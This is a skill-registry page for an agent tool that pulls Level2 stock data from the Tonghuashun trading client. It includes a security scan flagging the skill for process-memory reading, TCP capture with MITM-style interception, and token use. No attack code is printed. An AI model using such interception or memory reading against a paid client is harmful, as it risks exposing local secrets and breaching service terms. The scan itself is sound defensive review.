ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

同花顺Level2数据接入

v1.0.0

同花顺Level2数据获取与深度分析工具。支持读取同花顺远航版本地数据、 分析股票行情、获取实时Level2数据、生成技术分析报告。 用于:(1) 获取持仓股票实时数据 (2) Level2资金流向分析 (3) 个股深度分析 (4) 生成投资策略报告

0· 84·0 current·0 all-time
by@claremouse007
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Suspicious
medium confidence
Purpose & Capability
The skill claims to extract Level2 data from the 同花顺远航 client and produce analyses; the repository contains many scripts that read local 同花顺 files (DataPushJob.xml, local DB path), generate protocol client code, call Tushare, and perform technical/capital analyses — these capabilities are coherent with the stated purpose. However, several included capabilities (memory reading, TCP stream capture / MITM suggestions) are high privilege and should be expected only if the goal is to obtain data that the client does not expose via APIs.
!
Instruction Scope
SKILL.md tells the user to copy the repo into the skills folder and run various scripts. The runtime instructions and several scripts (analyze_protocol.py, ths_memory_reader.py, ths_client.py) explicitly reference: reading local client files under D:\同花顺远航版, capturing TCP streams and performing MITM-like interception, and memory-reading that needs administrator privileges. Those actions access sensitive local state beyond simple API calls and broaden the risk surface. The instructions do not direct any explicit remote exfiltration, but the code could be run to collect sensitive local data.
Install Mechanism
There is no automated install spec (instruction-only installation via copying or git clone). That lowers supply-chain risk from remote installers, but the package still contains 25+ Python files which will run when executed. The SKILL.md suggests a git clone URL placeholder (https://github.com/your-repo/ths-level2.git), but the registry source/homepage are unknown — lack of a verified upstream is a provenance concern.
Credentials
Registry metadata declares no required env vars, but many scripts read TUSHARE_TOKEN from the environment (SKILL.md even recommends exporting it). The skill also expects a local同花顺 install path and optional access to its DB/XML and to network endpoints (hevo-h.10jqka.com.cn:9601). Asking for a Tushare token is proportional to the stated extended-data features, but the manifest did not list it as required — a mild inconsistency. No other unrelated credentials are requested in metadata.
Persistence & Privilege
always:false and disable-model-invocation:false (normal). The skill does not declare or appear to require permanent agent-wide privileges or modifications to other skills. It does include scripts that write analysis files to the skill directory, which is expected behavior.
What to consider before installing
Key points before you install or run this skill: - Source provenance: the skill's registry entry has no homepage and the SKILL.md references a placeholder git URL; only proceed if you can verify the upstream repository and its author. Do not run untrusted code from unknown origins. - High‑privilege operations: several scripts attempt to read the local 同花顺 client files, parse DataPushJob.xml, perform TCP stream capture and even read process memory. These require administrator privileges and access to local network streams — only enable/run such features in an isolated environment (VM) and with explicit consent and understanding of legal/ToS implications. - Secrets: the code reads TUSHARE_TOKEN from the environment. If you provide your Tushare token, treat it as sensitive and avoid giving it to untrusted code. Consider using a limited/scoped token or a throwaway account for testing. - Review code: because installation is manual (copying the repo), open and inspect ths_memory_reader.py, analyze_protocol.py, ths_client.py, and any networking code before running. Look for any hardcoded remote endpoints, unexpected transmissions, or obfuscated code (none obvious in the provided files, but always verify). - Run minimal features first: to reduce risk, start with read-only analysis scripts that operate on sample or exported JSON data (ths_local_analysis.py, complete_technical_analysis.py) rather than the memory- or network-capture scripts. - Test in sandbox: run the repo in a disposable environment (VM or container) and with a non‑privileged user to confirm behavior before granting admin rights or pointing it at your real 同花顺 installation. - Legal/compliance: the SKILL.md warns that Level2 is a paid service — ensure you have rights to access and process this data and that intercepting the client/server traffic does not violate terms of service or laws in your jurisdiction. If you want, I can: (1) list the specific files that perform memory or network capture so you can inspect them first; (2) highlight places that would attempt outbound network connections; or (3) suggest a safe testing checklist/commands to run in a VM.

Like a lobster shell, security has layers — review code before you run it.

financevk9744fdfwz64fc1wx01j3ayc7183pgp0latestvk9744fdfwz64fc1wx01j3ayc7183pgp0level2vk9744fdfwz64fc1wx01j3ayc7183pgp0stockvk9744fdfwz64fc1wx01j3ayc7183pgp0technical-analysisvk9744fdfwz64fc1wx01j3ayc7183pgp0

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

Comments